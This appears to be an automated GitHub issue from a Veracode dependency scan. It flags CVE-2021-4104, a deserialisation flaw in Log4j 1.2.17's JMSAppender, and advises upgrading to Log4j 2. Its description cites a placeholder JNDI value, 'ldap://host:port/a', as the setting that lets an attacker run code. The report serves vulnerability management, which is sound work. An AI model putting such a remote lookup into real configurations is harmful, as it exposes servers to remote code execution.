5l1D3R / Github-actions

0 stars 0 forks source link

CVE: 2021-4104 found in Apache Log4j - Version: 1.2.17 [JAVA] #9

Open github-actions[bot] opened 1 year ago

github-actions[bot] commented 1 year ago

Veracode Software Composition Analysis

Attribute Details
Library Apache Log4j
Description Apache Log4j 1.2
Language JAVA
Vulnerability Deserialisation Of Untrusted Object
Vulnerability description JMSAppender in log4j is vulnerable to deserialization of untrusted object. When an application is configured to use JMSAppender with the setting TopicBindingName or TopicConnectionFactoryBindingName to something that JNDI can handle - for example "ldap://host:port/a", an attacker is able to execute code on the server as in Log4j 2.x CVE-2021-44228. However, this vulnerability is only depending on configuration. Note: This CVE is for Log4j 1.x and its corresponding flaw information for Log4j 2.x is in CVE-2021-44228.
CVE 2021-4104
CVSS score 6
Vulnerability present in version/s 1.1.3-1.2.17
Found library version/s 1.2.17
Vulnerability fixed in version
Library latest version 1.2.17
Fix log4j 1.x is End of Life. Its security vulnerabilities will not be fixed. Recommended to upgrade to the latest fix version of Log4j 2.

Links:

github-actions[bot] commented 1 year ago

Veracode issue link to PR: https://github.com/5l1D3R/Github-actions/pull/2